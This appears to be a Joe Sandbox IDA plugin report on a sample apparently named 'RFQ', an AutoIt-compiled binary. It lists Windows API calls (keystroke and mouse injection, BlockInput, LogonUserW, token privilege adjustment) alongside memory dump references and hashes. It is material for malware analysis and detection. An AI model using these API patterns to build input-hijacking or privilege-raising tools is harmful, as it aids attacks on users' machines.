Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 7b38b2ecbed5a1e59c9da5f4d9ab0b6c9d5f4c6c2524b978fdf7420ca1d1a298
• Instruction ID: 7e90e71cf11c653e8a4ff7cda6e6f0aef937794dc44f210dcb42cfd4b187220d
• Opcode Fuzzy Hash: 7b38b2ecbed5a1e59c9da5f4d9ab0b6c9d5f4c6c2524b978fdf7420ca1d1a298
• Instruction Fuzzy Hash: 12F08231100229EBDB219FA4DC49FEA776DBF093A1F008265F919D6181D6749A44CBA0
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00774153
• keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00774166
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
• Opcode ID: 70598f97377779c22729f877255b37d44603b412da26c44d993678b6997bff51
• Instruction ID: dbc5cf18fea6352e787eb915a844fdb6356027d14a5258421133143a57676aa6
• Opcode Fuzzy Hash: 70598f97377779c22729f877255b37d44603b412da26c44d993678b6997bff51
• Instruction Fuzzy Hash: 57F06D7090024DAFDF159FA4C805BBE7BB0EF00305F00C009F96596191D7798612DFA4
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0076ACC0), ref: 0076AB99
• CloseHandle.KERNEL32(?,?,0076ACC0), ref: 0076ABAB
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: 30cf84e91f0ba916cf8eaabbd39620dcde5f1824edf606b2088130d6a62f08bd
• Instruction ID: 00c851586a66ddfa4f6faadf7bff68ee73e976e1614f4f1e6ca7b3c02e86d241
• Opcode Fuzzy Hash: 30cf84e91f0ba916cf8eaabbd39620dcde5f1824edf606b2088130d6a62f08bd
• Instruction Fuzzy Hash: 2FE0E675004510EFE7252F54EC09E77B7E9EF04320B11C529F95A81475D7665C90DB50
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00756DB3,-0000031A,?,?,00000001), ref: 007581B1
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007581BA
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: dc7411eb647c5cf92c9d7d40f14bda9f0eb7c93d11e797306a80e3a438ff06b8
• Instruction ID: e138503e00a829ffd53f25d8206902660410c8039fe13b0b5774f1dff1221d3d
• Opcode Fuzzy Hash: dc7411eb647c5cf92c9d7d40f14bda9f0eb7c93d11e797306a80e3a438ff06b8
• Instruction Fuzzy Hash: 6BB09231044608EBDB102BA1EC0DF587FA8EB09652F048120F60D46062AB7758108B9A
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 30ce6be3dd0d279d649fbc562b8bf624709750e4ed43ae5cd84a312423100e04
• Instruction ID: c409e58276e984ebfbb280842b8bbbd53801197acedb06d54700ae4c4e58cf88
• Opcode Fuzzy Hash: 30ce6be3dd0d279d649fbc562b8bf624709750e4ed43ae5cd84a312423100e04
• Instruction Fuzzy Hash: B132F121D29F014DD7339634C862326A388EFB73D5F15D72BE81AB5AA6EB6CD8834104
Similarity
• API ID: __itow__swprintf
• String ID:
• API String ID: 674341424-0
• Opcode ID: 03045d514b8d997f6465056c55fa1abd287197374fc4af990d31cce5562bb70b
• Instruction ID: c64c15f6b62398f6c3162fb7c18e2d1906cd5f8b6fd4c7519133e1e6ecd7fb7a
• Opcode Fuzzy Hash: 03045d514b8d997f6465056c55fa1abd287197374fc4af990d31cce5562bb70b
• Instruction Fuzzy Hash: C5229A71508300EFE725DF14C894B6BB7E4BF84310F104A1DF99A97292DBB9E945CB92
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a618e1103b13d2aa7287563f712a4e02140fd1b26930e0f4aec5eb4ad589878b
• Instruction ID: 201706148fd700e260f9862b6e13056fad4c751b94671521655ff194b320c410
• Opcode Fuzzy Hash: a618e1103b13d2aa7287563f712a4e02140fd1b26930e0f4aec5eb4ad589878b
• Instruction Fuzzy Hash: E8B1D020D2AF414DD72396398831336B75CAFBB2D5B91D71BFC1AB4D22EB2695C34184
APIs
• __time64.LIBCMT ref: 0077B6DF
  • Part of subcall function 0075344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0077BDC3,00000000,?,?,?,?,0077BF70,00000000,?), ref: 00753453
  • Part of subcall function 0075344A: __aulldiv.LIBCMT ref: 00753473
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID:
• API String ID: 2893107130-0
• Opcode ID: 97072997099527196e1ef43183820178682214fc3fc6ebd27439c7eff6a85c79
• Instruction ID: 41d90e06238ca7927a9229c7fb58a54d7f977b8fd6a453eb9be2ee080ee4f9e9
• Opcode Fuzzy Hash: 97072997099527196e1ef43183820178682214fc3fc6ebd27439c7eff6a85c79
• Instruction Fuzzy Hash: 72216072634510CBC729CF28C881BA2B7E1EB95360B248E6DE4E5CF280CB78A905DB54
                                                                                                                                                    APIs
                                                                                                                                                    • BlockInput.USER32(00000001), ref: 00786ACA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BlockInput
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                                    • Opcode ID: 3b02002e3dbf5f8ef0b2ec0435508bc3b831f61b635e185e0bfa3ea6418a5995
                                                                                                                                                    • Instruction ID: 4f31cc131ae1c96baf011651b1039700e2589db87a2d3f2e96577e1fc719262d
                                                                                                                                                    • Opcode Fuzzy Hash: 3b02002e3dbf5f8ef0b2ec0435508bc3b831f61b635e185e0bfa3ea6418a5995
                                                                                                                                                    • Instruction Fuzzy Hash: 54E04835240204AFD710EF59D404E56B7ECAF74761F04C416F945D7351DAB8FC048BA1
                                                                                                                                                    APIs
                                                                                                                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0077750A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: mouse_event
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2434400541-0
                                                                                                                                                    • Opcode ID: 30c85a40da03930cd784a584640ec2e3ed28a9b0235e609b5770d396bef4fd93
                                                                                                                                                    • Instruction ID: 7f36f1e4d68c51c0f77e49d7c782d47a76615305429155dc3c5b84af0dc075bf
                                                                                                                                                    • Opcode Fuzzy Hash: 30c85a40da03930cd784a584640ec2e3ed28a9b0235e609b5770d396bef4fd93
                                                                                                                                                    • Instruction Fuzzy Hash: ACD06CA416C64569EC2D07249C1FFB61A08A3007C2FD8C699B60AA90C0F8AC6D11E035
                                                                                                                                                    APIs
                                                                                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0076AD3E), ref: 0076B124
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LogonUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1244722697-0
                                                                                                                                                    • Opcode ID: 4a65240aeda771fb3826e2f81997f8c3204860ea028512e1ed3fbc1fb6c031c5
                                                                                                                                                    • Instruction ID: 4745bd7c9d16483e738f035f62acdde27f3febe34a706017b06f3b14a38d0693
                                                                                                                                                    • Opcode Fuzzy Hash: 4a65240aeda771fb3826e2f81997f8c3204860ea028512e1ed3fbc1fb6c031c5
                                                                                                                                                    • Instruction Fuzzy Hash: A4D05E321A460EAEDF025FA4DC02EAE3F6AEB04700F408110FA11C50A0C675D931AB50
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: NameUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                                    • Opcode ID: 03110590200dc59b250d0cc75901f5da587223b3a7fad6a388d2ec1b129ace9e
                                                                                                                                                    • Instruction ID: 1b414138ef7b400f897c28f43cd3dec10e71ae28ed06175252214357b3c4c98d
                                                                                                                                                    • Opcode Fuzzy Hash: 03110590200dc59b250d0cc75901f5da587223b3a7fad6a388d2ec1b129ace9e
                                                                                                                                                    • Instruction Fuzzy Hash: CEC04CB1400109DFD751DFC0C944EEEB7BCAB04301F105191A105F1110E7749B459B76
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0075818F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: 04167230a338e775b172117ec652471ecdbedf5f226ed3d8878a45c039d2b227
                                                                                                                                                    • Instruction ID: 9a8b62a1d2009c6fed378cb14bb3d9e3a63a44d0a7a4e14df64e7bc182d5c1ad
                                                                                                                                                    • Opcode Fuzzy Hash: 04167230a338e775b172117ec652471ecdbedf5f226ed3d8878a45c039d2b227
                                                                                                                                                    • Instruction Fuzzy Hash: 45A0113000020CEB8F002B82EC088883FACEA002A0B008020F80C02022AB23A8208A8A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a27d91ae07691b23c971030542d259f56bbe45b6c11d26d07c58f5c003ab3fef
                                                                                                                                                    • Instruction ID: 8fae920d036ffd5de02fe14ee90fbe6bee80bc0b377bee65241c0e8b1dfc70d4
                                                                                                                                                    • Opcode Fuzzy Hash: a27d91ae07691b23c971030542d259f56bbe45b6c11d26d07c58f5c003ab3fef
                                                                                                                                                    • Instruction Fuzzy Hash: 42127170A01209EFEF04DFA8D985AAEB7F5FF48300F108569E506E7252EB79AD11CB54
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 56dfa5f9323d2ae67b68d08c0855a6641126b3bec8154b0a62175622f77b0ae8
                                                                                                                                                    • Instruction ID: fdbbd5494183c5141f84a4e11e24708ef54a82f7f961be7c355641d9a28a9ccc
                                                                                                                                                    • Opcode Fuzzy Hash: 56dfa5f9323d2ae67b68d08c0855a6641126b3bec8154b0a62175622f77b0ae8
                                                                                                                                                    • Instruction Fuzzy Hash: E912AF71A04205DFEB24DF58C485BBAB7B0FF58304F14C169E94A9B392E739AD81CB91
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 3728558374-0
• Opcode ID: 15145104e9c54eb47cf68ff3bc5c7df4bef9abcf87fe21037d372fb289178e2f
• Instruction ID: 128b5f79e0a12cb51cc341da53994e2fd090a136f571feaa169ea4994924c3f8
• Opcode Fuzzy Hash: 15145104e9c54eb47cf68ff3bc5c7df4bef9abcf87fe21037d372fb289178e2f
• Instruction Fuzzy Hash: 5602B4B0A00109DFDF04DF68D995AAEB7B5FF49300F10C069E906DB256EB39DA15CB91
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction ID: 6c13bb457e7090af688213a920d064319cc5c38d41e886855cf2e6d2d1e686d7
• Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction Fuzzy Hash: D4C1A6322051A30AEF2D4639C43457EFAA15EA27B331A076DD8B3CB5D5EF68C528D660
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
• Instruction ID: 63fa60c230b169688770aa7a71c39aad72fb72bd9fbda2e2a5bf1d71f6af411d
• Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
• Instruction Fuzzy Hash: 38C1C5332051A309EF2D4639C43457EBBA15EA2BB331A076DD8B3CB4D5EF68D528D660
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction ID: a472e69e064cbf0ba2ccba581e42742de0c238b408c1fab1d79f8dee2d7ec8d8
• Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction Fuzzy Hash: D7C1A5322090A309EF2D4639C47453EFBA15EA2BB631A077DD8B3CB5D5EF28C564D620
APIs
• DeleteObject.GDI32(00000000), ref: 0078A2FE
• DeleteObject.GDI32(00000000), ref: 0078A310
• DestroyWindow.USER32 ref: 0078A31E
• GetDesktopWindow.USER32 ref: 0078A338
• GetWindowRect.USER32(00000000), ref: 0078A33F
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0078A480
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0078A490
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A4D8
• GetClientRect.USER32(00000000,?), ref: 0078A4E4
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0078A51E
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A540
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A553
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A55E
• GlobalLock.KERNEL32(00000000), ref: 0078A567
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A576
• GlobalUnlock.KERNEL32(00000000), ref: 0078A57F
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A586
• GlobalFree.KERNEL32(00000000), ref: 0078A591
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A5A3
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007BD9BC,00000000), ref: 0078A5B9
• GlobalFree.KERNEL32(00000000), ref: 0078A5C9
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0078A5EF
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0078A60E
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A630
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A81D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
• Opcode ID: f6941ed3fb580a172926bf44fef16ce57255831b209d42462257e61957267ee1
• Instruction ID: 2045e04d40c64005375f9d49991ab963d3d9f5ff5c8d139c088c39a8a0e26e72
• Opcode Fuzzy Hash: f6941ed3fb580a172926bf44fef16ce57255831b209d42462257e61957267ee1
• Instruction Fuzzy Hash: 8C028075900108EFEB14DFA8DD89EAE7BB9FB48310F008159F905AB2A1DB78DD41CB64
APIs
• SetTextColor.GDI32(?,00000000), ref: 0079D2DB
• GetSysColorBrush.USER32(0000000F), ref: 0079D30C
• GetSysColor.USER32(0000000F), ref: 0079D318
• SetBkColor.GDI32(?,000000FF), ref: 0079D332
• SelectObject.GDI32(?,00000000), ref: 0079D341
• InflateRect.USER32(?,000000FF,000000FF), ref: 0079D36C
• GetSysColor.USER32(00000010), ref: 0079D374
• CreateSolidBrush.GDI32(00000000), ref: 0079D37B
• FrameRect.USER32(?,?,00000000), ref: 0079D38A
• DeleteObject.GDI32(00000000), ref: 0079D391
• InflateRect.USER32(?,000000FE,000000FE), ref: 0079D3DC
• FillRect.USER32(?,?,00000000), ref: 0079D40E
• GetWindowLongW.USER32(?,000000F0), ref: 0079D439
  • Part of subcall function 0079D575: GetSysColor.USER32(00000012), ref: 0079D5AE
  • Part of subcall function 0079D575: SetTextColor.GDI32(?,?), ref: 0079D5B2
  • Part of subcall function 0079D575: GetSysColorBrush.USER32(0000000F), ref: 0079D5C8
  • Part of subcall function 0079D575: GetSysColor.USER32(0000000F), ref: 0079D5D3
  • Part of subcall function 0079D575: GetSysColor.USER32(00000011), ref: 0079D5F0
  • Part of subcall function 0079D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0079D5FE
  • Part of subcall function 0079D575: SelectObject.GDI32(?,00000000), ref: 0079D60F
  • Part of subcall function 0079D575: SetBkColor.GDI32(?,00000000), ref: 0079D618
  • Part of subcall function 0079D575: SelectObject.GDI32(?,?), ref: 0079D625
  • Part of subcall function 0079D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0079D644
  • Part of subcall function 0079D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0079D65B
  • Part of subcall function 0079D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0079D670
  • Part of subcall function 0079D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0079D698
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
• String ID:
• API String ID: 3521893082-0
• Opcode ID: 565779f2c7c1aa70005c21db152453a73e9ad6e89b988f5fcf873384d771216e
• Instruction ID: d754c091dc4dcaf3033fccf899e76700005760aa7c8955c8560c5a9a21a67273
• Opcode Fuzzy Hash: 565779f2c7c1aa70005c21db152453a73e9ad6e89b988f5fcf873384d771216e
• Instruction Fuzzy Hash: 0E917C71408305BFCB209F64DC08E6ABBA9FF89325F108B19F962961A0E779DD44CB56
